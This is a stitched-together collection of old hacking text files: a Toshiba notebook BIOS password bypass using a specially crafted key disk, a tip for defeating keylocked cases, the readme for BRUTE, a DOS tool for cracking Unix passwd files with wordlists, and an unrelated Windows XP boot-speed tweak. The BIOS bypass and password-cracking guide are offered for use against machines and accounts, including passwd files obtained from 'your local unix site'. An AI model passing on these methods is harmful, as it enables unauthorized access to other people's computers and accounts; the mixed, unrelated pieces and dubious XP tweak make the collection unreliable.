Some Toshiba notebooks allow to bypass BIOS by inserting a "key-disk" in the floppy disk drive while booting. To create a Toshiba Keydisk, take a 720Kb or 1.44Mb floppy disk, format it (if it's not formatted yet), then use a hex editor such as Hex Workshop (***.bpsoft.com/downloads/index.html) to change the first five bytes of the second sector (the one after the boot sector) and set them to 4B 45 59 00 00 (note that the first three bytes are the ASCII for "KEY" followed by two zeroes). Once you have created the key disk put it into the notebook's drive and turn it on, then push the reset button and when asked for password, press Enter. You will be asked to Set Password again. Press Y and Enter. You'll enter the BIOS configuration where you can set a new password.

Key protected cases
A final note about those old computers (up to 486 and early Pentiums) protected with a key that prevented the use of the mouse and the keyboard or the power button. All you have to do with them is to follow the wires connected to the key hole, locate the jumper to which they are connected and unplug it.

BRUTE: A brute force approach to hacking Unix passwords


Here's how to use it in a nutshell...

Download the passwd file from your local unix site, or have someone download
it for you.  It should be in the unix format (that is, line feeds but no
carriage returns) so don't run it through any conversion programs--Brute uses
it "as-is".

To check a single password against your list do this:

BRUTE passwd Password

(that would check the passwd file for the password "Password").  Brute is
case sensitive (just as unix is), so "Password" is different than "password".

To convince yourself that brute actually works you'll probably want to run it
with your password and see that it pulls up your account.  It will.

---

Brute can be used with a list of passwords.  In this case, edit up a list or
use a pre-made one (one password per line) and call brute like this:

BRUTE passwd @passlist.txt

(where passlist.txt is the name of your list-of-passwords.  The @ sign tells
brute that you're using list file).  Note that you don't have to use the name
"passlist.txt" for your word list, and you don't have to use the name
"passwd" for the password file.  This allows you to keep separate word lists
for different types of unix sites, and separate password files.

Right now that's about it.  There are a few enhancements I'm planning in the
future, but this ought to do the trick for you.  Any passwords found are
written to the file "PWD_HITS.DAT".

Brute ignores unpassworded and invalidly-passworded accounts automatically,
so you should probably check the passwd file for these babys yourself.

---

Brute is about 25% faster than it's nearest competitor.

Have fun.

---

Version 1.1:  Fixed the icky short int bug which causes the "Password"
              counter to go negative after 32k attempts (changed to long
              int--now it will go negative should you reach 2 billion
              attempts in a single setting, which isn't extrememly likely.

              Added the "*" password to check for the username as a password
              (forward and reversed).  Either put * on a line by itself in
              your word list file, or call brute like this: brute passwd *
              ---

Version 2.0:  I'm using the fastcrypt routine as ported to DOS by Gandalf and
              distributed in OBJ form by sir hackalot.  I haven't measured
              the speed increase, but it's not as much as I had hoped.  Maybe
              twice as fast.  Anyhow, such is life.

 

How to Boot Winxp Fast

Follow the following steps

1. Open notepad.exe, type "del c:\windows\prefetch\ntosboot-*.* /q" (without the quotes) & save as "ntosboot.bat" in c:\
2. From the Start menu, select "Run..." & type "gpedit.msc".
3. Double click "Windows Settings" under "Computer Configuration" and double click again on "Shutdown" in the right window.
4. In the new window, click "add", "Browse", locate your "ntosboot.bat" file & click "Open".
5. Click "OK", "Apply" & "OK" once again to exit.
6. From the Start menu, select "Run..." & type "devmgmt.msc".
7. Double click on "IDE ATA/ATAPI controllers"
8. Right click on "Primary IDE Channel" and select "Properties".
9. Select the "Advanced Settings" tab then on the device or 1 that doesn't have 'device type' greyed out select 'none' instead of 'autodetect' & click "OK".
10. Right click on "Secondary IDE channel", select "Properties" and repeat step 9.
11. Reboot your computer.